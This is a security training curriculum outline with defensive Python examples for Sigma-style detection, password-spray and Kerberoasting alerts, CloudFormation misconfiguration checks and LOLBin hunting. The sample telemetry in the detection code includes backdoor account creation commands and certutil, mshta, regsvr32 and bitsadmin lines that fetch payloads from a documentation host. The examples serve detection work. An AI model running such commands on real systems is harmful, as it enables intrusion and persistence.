This curriculum spans the design and operationalization of security programs at the breadth and technical depth of a multi-workshop threat engineering engagement. It covers intelligence integration, detection architecture, incident orchestration, identity controls, cloud workload protection, third-party risk, proactive hunting, and the governance practices used in mature security organizations.
Module 1: Threat Landscape Analysis and Intelligence Integration
- Selecting and validating threat intelligence feeds based on relevance to industry sector, geographic operations, and adversary TTPs.
- Mapping external threat data to internal telemetry using MITRE ATT&CK to prioritize detection engineering efforts.
- Establishing volume thresholds and expiry rules for automated IOC ingestion so that bulk or stale indicators do not degrade SIEM performance.
- Deciding whether to build, buy, or partner for threat intelligence capabilities based on team maturity and budget.
- Integrating threat intelligence into vulnerability management workflows to adjust patching urgency.
- Designing processes to deconflict false positives when correlating open-source threat reports with internal alerts.
Module 2: Detection Engineering and Security Analytics
- Developing detection rules that balance sensitivity and specificity to reduce alert fatigue without missing stealthy attacks.
- Implementing Sigma rules across heterogeneous log sources while accounting for schema normalization (field names, case, path separators) so that one rule matches the same behavior in every source.
- Choosing between on-premises, cloud-native, or hybrid SIEM architectures based on data residency and scalability needs.
- Validating detection logic using purple team exercises and historical breach data.
- Managing retention policies for raw logs versus aggregated telemetry to meet forensic requirements and cost constraints.
- Integrating EDR telemetry with network detection systems to enable cross-domain correlation.
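The schema-normalization problem from this module, shown as an added example rather than code from the page, the Sigma project, or any SIEM product: process-creation events from a Windows Sysmon export and a Linux auditd line are mapped onto one small common schema, and a single Sigma-style rule (selections with `|contains`, `|endswith` and `|all` modifiers, a filter, and a `1 of selection* and not filter` condition) is evaluated against both. The sample records are constructed; the field names copy the Sysmon and auditd conventions they imitate, and the condition evaluator covers only the subset of Sigma's grammar used here.

```python
"""Schema normalization plus a Sigma-style rule evaluated over two log
sources. Added example for this module; not code from any SIEM product or
from the Sigma project itself. The sample records are constructed; the field
names copy the Sysmon and auditd conventions they imitate."""
import fnmatch
import re

# Constructed sample: Sysmon Event ID 1 records as a log shipper exports them
# to JSON, and Linux auditd EXECVE records already flattened to key=value lines.
SYSMON_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user backdoor Passw0rd! /add"},
    {"EventID": 1, "Computer": "WS01", "User": "CORP\\jdoe",
     "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net view \\\\fileserver"},
]
AUDITD_LINES = [
    'type=EXECVE node=lnx01 uid=1000 exe="/usr/sbin/useradd" cmdline="useradd -m backdoor"',
    'type=EXECVE node=lnx01 uid=1000 exe="/usr/bin/ls" cmdline="ls -la /tmp"',
]

# Common schema: host, user, image (lower-case, forward slashes), cmd.
def normalize_sysmon(ev):
    return {"host": ev["Computer"], "user": ev["User"],
            "image": ev["Image"].lower().replace("\\", "/"),
            "cmd": ev["CommandLine"]}

KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

def normalize_auditd(line):
    fields = {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
              for m in KV_RE.finditer(line)}
    return {"host": fields["node"], "user": fields["uid"],
            "image": fields["exe"].lower(), "cmd": fields["cmdline"]}

# A Sigma-like rule written against the normalized schema. One rule covers
# both platforms because the selections target normalized fields.
RULE = {
    "title": "Local account creation from the command line",
    "detection": {
        "selection_win": {"image|endswith": "/net.exe",
                          "cmd|contains|all": ["user", "/add"]},
        "selection_lnx": {"image|endswith": "/useradd"},
        "filter": {"user|contains": "svc_provisioning"},
        "condition": "1 of selection* and not filter",
    },
}

def _match_value(value, pattern, mods):
    """Sigma string matching is case-insensitive; modifiers change the comparison."""
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in mods:
        return p in v
    if "startswith" in mods:
        return v.startswith(p)
    if "endswith" in mods:
        return v.endswith(p)
    return v == p

def match_selection(record, selection):
    for key, pattern in selection.items():
        field, *mods = key.split("|")
        patterns = pattern if isinstance(pattern, list) else [pattern]
        combine = all if "all" in mods else any  # list values are OR-ed by default
        if not combine(_match_value(record.get(field, ""), p, mods) for p in patterns):
            return False
    return True

def evaluate(rule, record):
    """Supports the condition subset: terms joined by 'and', optional 'not',
    and the '1 of x*' / 'all of x*' quantifiers."""
    det = rule["detection"]
    results = {n: match_selection(record, s) for n, s in det.items() if n != "condition"}

    def term(t):
        negate = t.startswith("not ")
        t = t[4:] if negate else t
        if " of " in t:
            quant, pat = t.split(" of ", 1)
            hits = [v for n, v in results.items() if fnmatch.fnmatch(n, pat)]
            value = (any if quant == "1" else all)(hits)
        else:
            value = results[t]
        return value != negate

    return all(term(t.strip()) for t in det["condition"].split(" and "))

def run(rule=RULE):
    records = [normalize_sysmon(e) for e in SYSMON_EVENTS]
    records += [normalize_auditd(line) for line in AUDITD_LINES]
    return [r for r in records if evaluate(rule, r)]

if __name__ == "__main__":
    for hit in run():
        print(f"{RULE['title']}: {hit['host']} {hit['user']} {hit['cmd']}")
```

The normalization step is where most cross-source rules break in practice: without lower-casing and unifying path separators, an `endswith` on `/net.exe` silently misses the Windows event, and the rule appears to work because the Linux side still fires.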
Module 3: Incident Response Orchestration and Playbook Design
- Defining escalation paths and decision gates for declaring incidents based on impact and attacker dwell time.
- Customizing SOAR playbooks to reflect organizational IT topology and third-party service dependencies.
- Documenting manual override procedures for automated containment actions to prevent business disruption.
- Coordinating communication protocols between legal, PR, and technical teams during active breaches.
- Establishing forensic data collection standards that preserve chain of custody for potential litigation.
- Conducting tabletop exercises with executive stakeholders to validate incident response decision timelines.
Module 4: Identity and Access Attack Surface Management
- Implementing just-in-time privileged access to reduce standing admin privileges across hybrid environments.
- Enforcing MFA across legacy applications using reverse proxy solutions where native support is absent.
- Monitoring for anomalous authentication patterns indicative of password spray (one source failing against many accounts, few attempts each) or Kerberoasting (one account requesting RC4 service tickets for many SPNs in a short window).
- Deciding whether to federate identity with third parties or maintain isolated trust boundaries.
- Managing service account lifecycle and credential rotation in containerized workloads.
- Responding to compromised identity providers by activating offline recovery processes and alternate auth channels.
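The two authentication anomalies named in this module, as an added example that is not part of the original outline or any vendor's detection content: a password-spray detector over Windows Event ID 4625 logon failures (wide and shallow: many distinct accounts from one source, no account hammered) and a Kerberoasting detector over Event ID 4769 service-ticket requests (one account pulling RC4-HMAC, type 0x17, tickets for many distinct SPNs). All events are constructed, and the window sizes and count thresholds are illustrative assumptions to tune against your own baseline.

```python
"""Two identity-attack detections over authentication telemetry: password
spraying from Windows Event ID 4625 logon failures and Kerberoasting from
Event ID 4769 service-ticket requests. Added example for this module; not
code from any SIEM or identity product. Every event below is constructed and
the thresholds are illustrative assumptions to tune against your baseline."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed 4625 failures: (timestamp, source IP, target account).
# 10.0.5.7 tries 14 different accounts once each within a minute (a spray);
# 10.0.9.2 is one user mistyping her password three times (not a spray).
FAILED_LOGONS = (
    [(f"2024-05-01T08:00:{i * 4:02d}", "10.0.5.7", f"user{i:02d}") for i in range(14)]
    + [(f"2024-05-01T08:0{i}:00", "10.0.9.2", "alice") for i in range(3)]
)

# Constructed 4769 requests: (timestamp, requesting account, service name,
# TicketEncryptionType). jdoe pulls RC4 (0x17) tickets for six SPNs in under
# a minute; appsvc renews one AES (0x12) ticket; a machine-account ticket
# (service name ending in $) is normal noise.
TGS_REQUESTS = [
    (f"2024-05-01T09:00:{i * 10:02d}", "jdoe", spn, 0x17)
    for i, spn in enumerate(["MSSQLSvc/db01", "MSSQLSvc/db02", "HTTP/intranet",
                             "CIFS/backup01", "ldap/dc01", "exchangeMDB/mail01"])
] + [
    ("2024-05-01T09:00:05", "appsvc", "MSSQLSvc/db01", 0x12),
    ("2024-05-01T09:00:15", "appsvc", "MSSQLSvc/db01", 0x12),
    ("2024-05-01T09:00:20", "alice", "WS07$", 0x17),
]

def detect_password_spray(events=FAILED_LOGONS, window=timedelta(minutes=10),
                          min_accounts=10, max_per_account=3):
    """Flag a source that failed against many distinct accounts inside one
    window while never hammering a single account (wide and shallow), which
    is what separates a spray from one user's typos or a brute force."""
    by_src = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((datetime.fromisoformat(ts), user))
    alerts = []
    for src, items in by_src.items():
        items.sort()
        for i, (t0, _) in enumerate(items):  # sliding window anchored at each failure
            per_user = Counter(u for t, u in items[i:] if t - t0 <= window)
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_per_account:
                alerts.append({"src": src, "accounts": len(per_user),
                               "first_seen": t0.isoformat()})
                break
    return alerts

def detect_kerberoast(events=TGS_REQUESTS, window=timedelta(minutes=5), min_services=5):
    """Flag an account that requested RC4-HMAC (0x17) service tickets for many
    distinct SPNs in a short window. RC4 tickets are what offline cracking tools
    ask for; machine accounts and krbtgt are excluded as expected noise."""
    by_acct = defaultdict(list)
    for ts, acct, spn, etype in events:
        if etype == 0x17 and not spn.endswith("$") and spn.split("/")[0].lower() != "krbtgt":
            by_acct[acct].append((datetime.fromisoformat(ts), spn))
    flagged = []
    for acct, items in by_acct.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            spns = {s for t, s in items[i:] if t - t0 <= window}
            if len(spns) >= min_services:
                flagged.append({"account": acct, "services": len(spns),
                                "first_seen": t0.isoformat()})
                break
    return flagged

if __name__ == "__main__":
    print("spray:", detect_password_spray())
    print("kerberoast:", detect_kerberoast())
```

Both detectors key on distinct counts rather than raw volume, which is why a single locked-out user or a busy service account does not trip them; the per-account ceiling in the spray check is the part most often left out and the usual source of false positives.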
Module 5: Cloud Security Posture and Workload Protection
- Enforcing cloud network segmentation using security groups and NSGs across multi-account AWS or multi-subscription Azure environments.
- Implementing runtime protection for serverless functions to detect and block malicious execution.
- Running IaC scanning, standalone or as part of a CSPM platform, to detect misconfigurations in templates prior to deployment.
- Managing shared responsibility model gaps in SaaS applications where tenant controls are limited.
- Securing container images by integrating vulnerability scanning into CI/CD pipelines.
- Responding to public cloud storage bucket exposure by automating detection and access revocation.
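A pre-deployment template check of the kind the segmentation, IaC-scanning and bucket-exposure items above describe, as an added example that is not code from the page or from any CSPM or IaC scanner: it walks a CloudFormation template and reports security-group ingress rules open to the whole internet on sensitive ports (or on every port via protocol `-1`), and S3 buckets whose `PublicAccessBlockConfiguration` is not fully enabled. The template is constructed, and the sensitive-port list is an assumption to adapt locally; Azure NSG rules would need the same treatment against their own property names.

```python
"""Pre-deployment check of a CloudFormation template for two frequent
findings: security group ingress open to the whole internet on sensitive
ports, and S3 buckets without a complete public access block. Added example
for this module; not code from any CSPM or IaC scanner. The template is
constructed and the sensitive-port list is an assumption to adapt locally."""
import ipaddress

TEMPLATE = {
    "Resources": {
        "WebSg": {"Type": "AWS::EC2::SecurityGroup", "Properties": {
            "SecurityGroupIngress": [
                {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "CidrIp": "0.0.0.0/0"},
                {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22, "CidrIp": "0.0.0.0/0"},
            ]}},
        "AdminSg": {"Type": "AWS::EC2::SecurityGroup", "Properties": {
            "SecurityGroupIngress": [
                {"IpProtocol": "tcp", "FromPort": 3389, "ToPort": 3389, "CidrIp": "10.20.0.0/16"},
                {"IpProtocol": "-1", "CidrIpv6": "::/0"},
                {"IpProtocol": "tcp", "FromPort": 0, "ToPort": 65535,
                 "SourceSecurityGroupId": "sg-0123456789abcdef0"},
            ]}},
        "LogsBucket": {"Type": "AWS::S3::Bucket", "Properties": {
            "PublicAccessBlockConfiguration": {
                "BlockPublicAcls": True, "IgnorePublicAcls": True,
                "BlockPublicPolicy": True, "RestrictPublicBuckets": True}}},
        "ExportsBucket": {"Type": "AWS::S3::Bucket", "Properties": {
            "PublicAccessBlockConfiguration": {
                "BlockPublicAcls": True, "IgnorePublicAcls": False}}},
    }
}

# Assumed list of ports that should never face the internet directly.
SENSITIVE_PORTS = {22: "SSH", 3389: "RDP", 1433: "MSSQL", 3306: "MySQL",
                   5432: "PostgreSQL", 6379: "Redis"}
PUBLIC_ACCESS_KEYS = ("BlockPublicAcls", "IgnorePublicAcls",
                      "BlockPublicPolicy", "RestrictPublicBuckets")

def is_world_open(rule):
    """True for 0.0.0.0/0 or ::/0; False when the source is another security
    group or a prefix list, which is not an internet exposure by itself."""
    cidr = rule.get("CidrIp") or rule.get("CidrIpv6")
    if not cidr:
        return False
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0

def exposed(rule):
    """Describe the sensitive ports a rule reaches; '-1' means every protocol."""
    proto = str(rule.get("IpProtocol"))
    if proto == "-1":
        return ["all protocols and ports"]
    if proto not in ("tcp", "udp", "6", "17"):
        return []
    lo, hi = int(rule.get("FromPort", 0)), int(rule.get("ToPort", 65535))
    return [f"{name} ({port})" for port, name in sorted(SENSITIVE_PORTS.items())
            if lo <= port <= hi]

def check_template(template):
    """Return (resource name, issue) pairs in template order."""
    findings = []
    for name, res in template.get("Resources", {}).items():
        props = res.get("Properties", {})
        if res.get("Type") == "AWS::EC2::SecurityGroup":
            for rule in props.get("SecurityGroupIngress", []):
                if not is_world_open(rule):
                    continue
                src = rule.get("CidrIp") or rule.get("CidrIpv6")
                for what in exposed(rule):
                    findings.append((name, f"{what} open to {src}"))
        elif res.get("Type") == "AWS::S3::Bucket":
            pab = props.get("PublicAccessBlockConfiguration", {})
            missing = [k for k in PUBLIC_ACCESS_KEYS if pab.get(k) is not True]
            if missing:
                findings.append((name, "public access block incomplete: " + ", ".join(missing)))
    return findings

if __name__ == "__main__":
    for resource, issue in check_template(TEMPLATE):
        print(f"{resource}: {issue}")
```

Two details matter for a check like this in a pipeline gate: port ranges must be tested by containment (a `0-65535` rule exposes SSH even though `22` never appears in the template), and a missing key in the public access block must count as a failure, not just an explicit `False`.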
Module 6: Supply Chain and Third-Party Risk Mitigation
- Assessing software bill of materials (SBOM) completeness and accuracy from vendors during procurement.
- Requiring third parties to provide evidence of breach notification timelines and logging access.
- Implementing network microsegmentation to restrict lateral movement from compromised vendor connections.
- Conducting technical audits of vendor environments when contractual access is permitted.
- Managing risk acceptance decisions for critical vendors with substandard security practices.
- Establishing telemetry-sharing agreements with key partners to improve threat visibility.
Module 7: Threat Hunting and Adversary Emulation
- Scoping threat hunts based on recent IOCs, business context, and system criticality.
- Developing custom queries to detect living-off-the-land binaries (LOLBins) in endpoint logs.
- Using adversary emulation plans to test detection coverage without disrupting production systems.
- Documenting hunting hypotheses and findings in structured formats for knowledge reuse.
- Coordinating red team activities with change management so that emulated attacks are not mistaken for real outages or trigger unplanned incident response.
- Measuring detection gap closure rates over time to demonstrate security program improvement.
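The LOLBin hunting query from this module, written out as an added example rather than code from the page or from any EDR vendor: process-creation records shaped like Sysmon Event ID 1 (Image, OriginalFileName, CommandLine, ParentImage) are checked against the widely documented abuse patterns for certutil, mshta, rundll32, regsvr32, msiexec and bitsadmin. Rules are keyed on OriginalFileName, the name compiled into the PE, so a copy renamed to `svchost.exe` is still evaluated and the rename itself is reported. The records are constructed and 203.0.113.10 is a documentation address.

```python
"""Hunting for living-off-the-land binary (LOLBin) abuse in process-creation
telemetry. Added example for this module; not code from any EDR vendor. The
records are constructed in the shape of Sysmon Event ID 1 fields (Image,
OriginalFileName, CommandLine, ParentImage); the patterns are the widely
documented abuse cases for certutil, mshta, rundll32, regsvr32, msiexec and
bitsadmin, and the download host 203.0.113.10 is a documentation address."""
import shlex
from pathlib import PureWindowsPath

# ParentImage is carried for analyst context only; the rules below look at the
# binary's identity and its arguments.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/a.txt C:\Users\Public\a.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -verify -urlfetch C:\certs\server.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": "mshta.exe https://203.0.113.10/x.hta",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": "regsvr32 /s /n /u /i:http://203.0.113.10/f.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"svchost.exe C:\Users\Public\p.dll,Start",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority normal http://203.0.113.10/p.exe C:\Users\Public\p.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

def _has_url(args):
    return any(a.startswith(("http://", "https://", "ftp://")) for a in args)

# Each rule receives the lower-cased arguments after argv[0].
RULES = {
    "certutil.exe": lambda a: _has_url(a) or any(
        t in ("-urlcache", "-decode", "-decodehex", "-encode") for t in a),
    "mshta.exe": lambda a: _has_url(a) or any(
        t.startswith(("javascript:", "vbscript:")) for t in a),
    "rundll32.exe": lambda a: any(
        t.startswith("javascript:") or t.startswith("url.dll,openurl") for t in a),
    "regsvr32.exe": lambda a: any(
        t.startswith(("/i:http", "/i:ftp")) or t.endswith("scrobj.dll") for t in a),
    "msiexec.exe": lambda a: _has_url(a),
    "bitsadmin.exe": lambda a: "/transfer" in a and _has_url(a),
}

def hunt(events=EVENTS):
    """Return (finding, command line) pairs. Rules are keyed on OriginalFileName
    so a renamed copy is still matched, and the rename itself is reported
    because legitimate use does not rename system binaries."""
    findings = []
    for ev in events:
        image_name = PureWindowsPath(ev["Image"]).name.lower()
        original = ev.get("OriginalFileName", image_name).lower()
        if original not in RULES:
            continue
        # posix=False keeps Windows backslashes literal and quoted paths intact.
        args = [t.lower() for t in shlex.split(ev["CommandLine"], posix=False)][1:]
        if image_name != original:
            findings.append((f"renamed {original}", ev["CommandLine"]))
        if RULES[original](args):
            findings.append((f"{original} abuse", ev["CommandLine"]))
    return findings

if __name__ == "__main__":
    for finding, cmd in hunt():
        print(f"{finding}: {cmd}")
```

The second certutil record (`-verify -urlfetch`) is deliberately benign so the query is tested against a legitimate use of the same binary; a hunt query that fires on every certutil execution is an inventory, not a detection.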
Module 8: Governance, Metrics, and Continuous Improvement
- Defining KPIs such as mean time to detect (MTTD) and mean time to respond (MTTR) with realistic baselines.
- Aligning security metrics with business risk appetite for executive reporting and budget justification.
- Conducting post-incident reviews to update controls and prevent recurrence without assigning blame.
- Managing audit findings related to control deficiencies while prioritizing remediation based on exploitability.
- Updating security policies to reflect changes in regulatory requirements and threat behaviors.
- Rotating detection signatures and defensive configurations to counter attacker adaptation.